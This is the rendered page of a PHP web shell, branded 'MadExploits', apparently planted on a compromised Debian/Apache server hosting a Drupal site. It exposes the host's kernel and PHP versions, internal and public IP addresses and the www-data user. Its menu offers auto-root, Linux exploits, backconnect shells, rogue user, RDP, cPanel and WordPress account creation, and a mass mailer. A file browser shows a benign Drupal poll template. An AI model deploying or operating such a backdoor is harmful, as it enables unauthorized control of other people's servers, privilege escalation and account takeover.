Linux polon 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
Apache/2.4.59 (Debian)
: 10.2.73.233 | : 3.133.155.253
Cant Read [ /etc/named.conf ]
5.6.40-64+0~20230107.71+debian10~1.gbp673146
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
baltic /
web /
modules /
poll /
[ HOME SHELL ]
Name
Size
Permission
Action
poll-bar--block.tpl.php
709
B
-rw-r--r--
poll-bar.tpl.php
775
B
-rw-r--r--
poll-results--block.tpl.php
822
B
-rw-r--r--
poll-results.tpl.php
789
B
-rw-r--r--
poll-rtl.css
134
B
-rw-r--r--
poll-vote.tpl.php
797
B
-rw-r--r--
poll.css
809
B
-rw-r--r--
poll.info
344
B
-rw-r--r--
poll.install
5.94
KB
-rw-r--r--
poll.module
30.08
KB
-rw-r--r--
poll.pages.inc
3.05
KB
-rw-r--r--
poll.test
33.46
KB
-rw-r--r--
poll.tokens.inc
2.83
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : poll-results.tpl.php
<?php /** * @file * Default theme implementation to display the poll results in a block. * * Variables available: * - $title: The title of the poll. * - $results: The results of the poll. * - $votes: The total results in the poll. * - $links: Links in the poll. * - $nid: The nid of the poll * - $cancel_form: A form to cancel the user's vote, if allowed. * - $raw_links: The raw array of links. * - $vote: The choice number of the current user's vote. * * @see template_preprocess_poll_results() * * @ingroup themeable */ ?> <div class="poll"> <?php print $results; ?> <div class="total"> <?php print t('Total votes: @votes', array('@votes' => $votes)); ?> </div> <?php if (!empty($cancel_form)): ?> <?php print $cancel_form; ?> <?php endif; ?> </div>
Close